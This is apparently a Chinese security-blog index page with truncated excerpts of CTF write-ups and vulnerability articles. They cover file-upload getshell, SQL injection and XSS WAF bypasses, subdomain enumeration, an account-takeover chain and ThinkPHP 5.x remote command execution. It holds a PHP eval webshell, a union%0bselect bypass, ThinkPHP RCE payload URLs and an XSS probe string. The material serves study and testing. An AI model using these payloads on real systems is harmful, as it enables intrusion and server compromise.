前言
最近做培训和题目讲解的时候,做到bugku的一道题目,bugku的题目想必ctfer都已经耳熟能详了,网上的writeup铺天盖地。
但我今天单独写了一篇文章来写一道题肯定是有原因的,其中一道题是这样的:
1.网上铺天盖地的writeup写到:直接访问http://120.24.86.145:8007/web2/flag即可得到flag
2.此题真坑,竟然是脑洞,访问flag文件就好了
.....
我看到题目价值200分,放在bugku众多web的后段,怎么看都不...
安恒杯2018年10月月赛WriteUp
Web
手速要快
打开给了个登录框要密码。密码在消息头里就给出了。
登陆后要上传文件:
上传个一句话木马上去:
$ cat 1.jpg
<?php @eval($_POST['h']);?>
在bp里改成1.php.jpg后上传成功:
可以看到已经getshell:
flag在上一级目录里:
easy audit
打开给了一串随机数,并告诉有一些有趣的方法在flag.php里。F12查看源码提示了index.php?func1:
...
skysql之union绕waf
前记
以前校赛的时候出了一道skysql
灵感来自于bendawang师傅的一篇博客(像巨佬致敬orz)
今天正好有空写了一下题解
题目解法
题目过滤比较严格
盲注和报错注入都不太容易实现
但是不难发现
单个fuzz的话
union和select都没有被过滤
但是联合一起的话,union select是被过滤的
所以我可以猜想他的waf正则写法是:
1
|union select|
所以我们可以尝试绕过
1
union%0bselect
此时发现...
阿里云OSS约等于文件上传漏洞?
首先声明这是一篇标题党的文章,阿里云OSS不被这个锅,锅其实还是在企业或者说是用户。
前言
之所以要写这篇口水文,是因为最近在检测自家公司产品时发现存在这个问题,同时不久在测试某src的某系统时也存在类似这种问题,所以个人认为还是要提高一些警惕,让开发或测试者尽量消除不必要的麻烦,不要错误的认为文件托管在oss就可以忽略站内的上传功能存在的安全隐患。
概述
首先借用阿里云oss首页的介绍性...
渗透测试之子域名探测指南
原文链接:https://blog.appsecco.com/a-penetration-testers-guide-to-sub-domain-enumeration-7d842d5570f6
前言
作为一名渗透测试人员,或者说一个漏洞赏金猎人,一般情况下,当您进行安全测试时,您将获得一个或一组域名。您必须进行广泛的信息搜集,以找到有用的信息,如服务器,Web应用程序,属于目标组织的域等,从而增加您找到漏洞的机会。
我们撰写了一篇关于技术博文(https://blog.appsecco.com/...
组合漏洞导致的账号劫持
Login CSRF + DOM-XSS + unsafe URL redirect = ATO
在最近参与的一次对站点A的众测中,我发现A可以使用QQ账号进行登陆。在过去的几个月里,我发现了大量关于OAuth登陆劫持的漏洞,如果你有兴趣,可以参考:OAuth回调参数漏洞案例解析
尽管我相信目标A已经不存在OAuth登陆劫持漏洞(因为QQ已经在redirect_uri参数上做了强校验),但是我仍打算对它的登陆流程一探究竟。
下面,我以A.com代表目标A的域名来...
thinkphp 5.0-5.1 命令执行流水账记录
0x00 没有开头
0x01 文章参考
0x00 没有开头
环境部署安排一下

bt一键部署:配合泛解析域名,轻松部署环境
漏洞复现 qq.com为vuln host
http://qq.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[l][]=id
//5.1
http://qq.com/?s=index/\think\Request/input&filter=phpinfo&data=1
http://qq.com/?s=index/\think\template...
[转]XSS WAF规则探测与绕过
*本文作者:Conan,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。
前言
本文是以B站一个有趣的XSS(已修复)为引子(为什么说有趣后面再解释),作为实例分析其WAF的规则,方便大家加深对XSS WAF探测以及针对性bypass的理解。
进入主题
一、一般waf是由多条正则配合使用,因而绕过也必须根据实际情况构造xss探针'`";><aaa bbb=ccc>ddd<aaa/>的方式逐步理清waf规则,对于没被wa的再在chrome...